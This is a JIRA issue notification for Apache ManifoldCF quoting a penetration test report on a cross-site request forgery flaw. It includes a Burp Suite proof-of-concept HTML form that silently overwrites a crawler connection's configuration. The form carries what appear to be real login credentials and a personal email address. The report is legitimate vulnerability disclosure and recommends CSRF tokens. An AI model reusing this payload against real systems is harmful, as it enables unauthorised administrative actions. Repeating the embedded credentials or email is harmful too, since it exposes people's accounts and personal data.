[
https://issues.apache.org/jira/browse/CONNECTORS-1595?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16803842#comment-16803842
]
Karl Wright commented on CONNECTORS-1595:
-----------------------------------------
[~goovaertsr] I am going to assign these to the fellow who wrote the current UI
and see what he says. I expect some things would be easier to address than
others.
> cross-site request forgery vulnerability
> ----------------------------------------
>
> Key: CONNECTORS-1595
> URL: https://issues.apache.org/jira/browse/CONNECTORS-1595
> Project: ManifoldCF
> Issue Type: Improvement
> Components: API
> Affects Versions: ManifoldCF 2.12
> Reporter: roel goovaerts
> Priority: Minor
>
> Below is the full analysis and description as a result from the penetration
> test.
> *Summary*
> The application is vulnerable to Cross-Site Request Forgery (CSRF).
> A cross-site request forgery attack uses the following scenario:
> 1. An attacker creates a web page that includes an image or a form pointing
> to the attacked application.
> The image source would actually be a URL with parameters pointing to the
> application page that
> performs some action. In case of a form, the form action would point to the
> action page in the target
> application, and the form is submitted automatically by JavaScript when the
> page is viewed.
> 2. The attacker tricks the victim user to browse to this page. The attacker
> may get the victim to click a
> link, or embed the attacking HTML code into some page the victim views, for
> example in a bulletin
> board or chat.
> 3. When the victim views the attacker's page, his browser sends a request
> prepared by the attacker to
> the attacked application. If the victim is logged in to the target
> application, his browser will possess
> all necessary session tokens, so the request will appear as authorized to the
> application and
> succeed.
> A cross-site request forgery attack uses the fact that the victim's browser
> possesses the necessary
> authentication tokens to perform some actions in the target application.
> *Impact*
> A remote, unauthenticated attacker that can trick an authenticated user into
> clicking a link crafted by the
> attacker or open a malicious web page, can force the victim to unknowingly
> perform various actions within
> the application.
> Given that the whole application is not protected against CSRF, any action
> that an administrator can take on
> Apache Manifold could be unknowingly performed if they fall for a CSRF attack.
> *Affected Systems*
> * [https://els-manifold-uat.bc:8475/mcf-crawler-ui/]
> *Description*
> It appears that the application does not implement any CSRF protection.
> Consider the following example. An
> attacker tricks a logged in application user to visit a page containing the
> following code:
> {code:java}
> <html>
> <!-- CSRF PoC - generated by Burp Suite Professional -->
> <body>
> <script>history.pushState('', '', '/')</script>
> <form action="https://els-manifold-uat.bc:8475/mcf-crawler-ui/execute.jsp";
> method="POST" enctype="multipart/form-data">
> <input type="hidden" name="op" value="Save" />
> <input type="hidden" name="type" value="connection" />
> <input type="hidden" name="tabname" value="Name" />
> <input type="hidden" name="isnewconnection" value="false" />
> <input type="hidden" name="connname" value="clix-fr" />
> <input type="hidden" name="description" value="" />
> <input type="hidden" name="classname"
> value="org.apache.manifoldcf.crawler.connectors.webcrawler.Webcr
> awlerConnector" />
> <input type="hidden" name="authorityname" value="_none_" />
> <input type="hidden" name="throttlecount" value="0" />
> <input type="hidden" name="maxconnections" value="10" />
> <input type="hidden" name="email"
> value="ferdi.klomp@craftworkz.nl" />
> <input type="hidden" name="robotsusage" value="none" />
> <input type="hidden" name="metarobotstagsusage" value="all" />
> <input type="hidden" name="regexp_bandwidth_0" value="" />
> <input type="hidden" name="insensitive_bandwidth_0" value="false" />
> <input type="hidden" name="connections_bandwidth_0" value="2" />
> <input type="hidden" name="rate_bandwidth_0" value="64" />
> <input type="hidden" name="fetches_bandwidth_0" value="12" />
> <input type="hidden" name="bandwidth_count" value="1" />
> <input type="hidden" name="acredential_count" value="0" />
> <input type="hidden" name="scredential_0_regexp"
> value="https://intrauat.web.bc/" />
> <input type="hidden" name="scredential_0_0_regexp" value="login"
> />
> <input type="hidden" name="scredential_0_0_type" value="form" />
> <input type="hidden" name="scredential_0_0_matchregexp"
> value="validation" />
> <input type="hidden" name="scredential_0_0_overridetargeturl"
> value=""
> />
> <input type="hidden" name="scredential_0_0_0_op"
> value="Continue" />
> <input type="hidden" name="scredential_0_0_0_param"
> value="username" />
> <input type="hidden" name="scredential_0_0_0_value"
> value="id996812" />
> <input type="hidden" name="scredential_0_0_0_password"
> value="" />
> <input type="hidden" name="scredential_0_0_1_op"
> value="Continue" />
> <input type="hidden" name="scredential_0_0_1_param"
> value="password" />
> <input type="hidden" name="scredential_0_0_1_value"
> value="Th1sIs4cl1X" />
> <input type="hidden" name="scredential_0_0_1_password"
> value="" />
> <input type="hidden" name="scredential_0_0_2_op"
> value="Continue" />
> <input type="hidden" name="scredential_0_0_2_param"
> value="login-form-type" />
> <input type="hidden" name="scredential_0_0_2_value"
> value="pwd" />
> <input type="hidden" name="scredential_0_0_2_password"
> value="" />
> <input type="hidden" name="scredential_0_0_loginparamcount"
> value="3" />
> <input type="hidden" name="scredential_0_loginpagecount" value="1" />
> <input type="hidden" name="scredential_count" value="1" />
> <input type="hidden" name="regexp_trust_0"
> value="https://intrauat.web.bc" />
> <input type="hidden" name="trustall_trust_0" value="false" />
> <input type="hidden" name="trust_count" value="1" />
> <input type="hidden" name="proxyhost" value="" />
> <input type="hidden" name="proxyport" value="" />
> <input type="hidden" name="proxyauthusername" value="" />
> <input type="hidden" name="proxyauthdomain" value="" />
> <input type="hidden" name="proxyauthpassword" value="" />
> <input type="hidden" name="client_timezone_offset" value="-60" />
> <input type="hidden" name="client_timezone" value="Europe/Zurich" />
> <input type="submit" value="Submit request" />
> </form>
> </body>
> </html>
> {code}
> When the victim's browser parses the page and tries to load images, it will
> cause them to execute any action
> of the attacker's choosing on Manifold.
> *Recommendations*
> The usual approach to preventing CSRF attacks is to add a new parameter with
> an unpredictable value to
> each form or link that performs some action in the application, commonly
> referred to as a CSRF-Token. The
> parameter value should have enough entropy so that it cannot be predicted by
> an attacker and should be
> unique to the current user session. When the user submits the form or clicks
> the link, the server side code
> checks the parameter value. If it is valid, the request is accepted,
> otherwise it is denied. The attacker has no
> way of knowing the value of the unpredictable parameter, so he cannot
> construct a form or link that will
> submit a valid request.
> *References*
> * OWASP - Cross-Site Request Forgery -
> [https://www.owasp.org/index.php/Cross-]
> Site_Request_Forgery
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
